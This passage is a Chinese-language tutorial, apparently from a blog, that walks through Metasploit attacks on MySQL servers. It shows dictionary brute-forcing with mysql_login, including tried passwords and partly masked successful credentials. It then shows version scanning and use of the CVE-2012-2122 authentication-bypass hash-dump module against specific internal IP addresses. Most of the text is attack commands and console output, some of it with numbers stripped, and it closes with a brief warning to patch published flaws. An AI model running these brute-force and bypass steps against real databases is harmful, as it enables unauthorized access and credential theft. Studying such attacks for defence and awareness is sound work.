下面这个方式是普适的,但缺点就是必须要有自己的用户名和密码字典。其原理就是用user.txt与pass.txt的两个文本去不停交叉验证。
msf auxiliary(mysql_login) > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > show options Module options (auxiliary/scanner/mysql/mysql_login): Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED yes How fast to bruteforce, from to
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
RPORT yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts msf auxiliary(mysql_login) > set RHOSTS 10.199.169.160
RHOSTS => 10.199.169.160
msf auxiliary(mysql_login) > set RPORT 3307
RPORT =>
msf auxiliary(mysql_login) > set USER_FILE /home/user.txt
USER_FILE => /home/user.txt
msf auxiliary(mysql_login) > set PASS_FILE /home/pass.txt
PASS_FILE => /home/pass.txt
msf auxiliary(mysql_login) >
msf auxiliary(mysql_login) > exploit [*] 10.199.169.160: MYSQL - Found remote MySQL version 5.5.
[-] 10.199.169.160: MYSQL - LOGIN FAILED: tms:root (Incorrect: Access denied for user 'tms'@'192.168.132.113' (using password: YES))
[-] 10.199.169.160: MYSQL - LOGIN FAILED: tms:vipshop (Incorrect: Access denied for user 'tms'@'192.168.132.113' (using password: YES))
[-] 10.199.169.160: MYSQL - LOGIN FAILED: tms:vipshop!@# (Incorrect: Access denied for user 'tms'@'192.168.132.113' (using password: YES))
[-] 10.199.169.160: MYSQL - LOGIN FAILED: tms:cdtms (Incorrect: Access denied for user 'tms'@'192.168.132.113' (using password: YES))
[-] 10.199.169.160: MYSQL - LOGIN FAILED: root:root (Incorrect: Access denied for user 'root'@'192.168.132.113' (using password: YES))
[+] 10.199.169.160: MYSQL - Success: 'root:vi****p'
[-] 10.199.169.160: MYSQL - LOGIN FAILED: cdtms:root (Incorrect: Access denied for user 'cdtms'@'192.168.132.113' (using password: YES))
[-] 10.199.169.160: MYSQL - LOGIN FAILED: cdtms:vipshop (Incorrect: Access denied for user 'cdtms'@'192.168.132.113' (using password: YES))
[-] 10.199.169.160: MYSQL - LOGIN FAILED: cdtms:vipshop!@# (Incorrect: Access denied for user 'cdtms'@'192.168.132.113' (using password: YES))
[+] 10.199.169.160: MYSQL - Success: 'cdt**s:cdt**s'
[*] Scanned of hosts (% complete)
[*] Auxiliary module execution completed
另外,针对某些特定的Mysql版本,也可以采取一些特定的手段,比如Mysql的漏洞:CVE-2012-2122
假设我们得到了一个Mysql为5.1.61, 5.2.11, 5.3.5, 5.5.22的数据库(下面这个只是操作过程,数据库版本不是含漏洞版本)
msf > use auxiliary/scanner/mysql/mysql_version
msf auxiliary(mysql_version) > show options Module options (auxiliary/scanner/mysql/mysql_version): Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT yes The target port
THREADS yes The number of concurrent threads msf auxiliary(mysql_version) > set RHOSTS 10.199.128.61
RHOSTS => 10.199.128.61
msf auxiliary(mysql_version) > set THREADS
THREADS =>
msf auxiliary(mysql_version) > exploit [*] 10.199.128.61: is running MySQL 5.5.-log (protocol )
[*] Scanned of hosts (% complete)
[*] Auxiliary module execution completed
第一步就是获取mysql version。第二步便配置Mysql的IP和端口就可以exploit了(事实上有IP足够了,所有端口开放的服务都能扫描得到)
msf auxiliary(mysql_hashdump) > search CVE-- Matching Modules
================ Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/mysql/mysql_authbypass_hashdump -- normal MySQL Authentication Bypass Password Dump msf auxiliary(mysql_hashdump) > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf auxiliary(mysql_authbypass_hashdump) >
msf auxiliary(mysql_authbypass_hashdump) >
msf auxiliary(mysql_authbypass_hashdump) > show options Module options (auxiliary/scanner/mysql/mysql_authbypass_hashdump): Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT yes The target port
THREADS yes The number of concurrent threads
USERNAME root yes The username to authenticate as msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 10.199.128.61
RHOSTS => 10.199.128.61
msf auxiliary(mysql_authbypass_hashdump) > exploit [+] 10.199.128.61: The server allows logins, proceeding with bypass test
[*] 10.199.128.61: Authentication bypass is % complete
[*] 10.199.128.61: Authentication bypass is % complete
[*] 10.199.128.61: Authentication bypass is % complete
[*] 10.199.128.61: Authentication bypass is % complete
[*] 10.199.128.61: Authentication bypass is % complete
[*] 10.199.128.61: Authentication bypass is % complete
[*] 10.199.128.61: Authentication bypass is % complete
[*] 10.199.128.61: Authentication bypass is % complete
[*] 10.199.128.61: Authentication bypass is % complete
[*] 10.199.128.61: Authentication bypass is % complete
[-] 10.199.128.61: Unable to bypass authentication, this target may not be vulnerable
[*] Scanned of hosts (% complete)
[*] Auxiliary module execution completed
然后这样就这么简单,你会得到一个用户名和密码。
-------------------
想想看,假设你的数据库有漏洞,别人有你一个公网IP,就能获取你的数据库信息。。。所以,网上公布重大漏洞时,不要置身事外。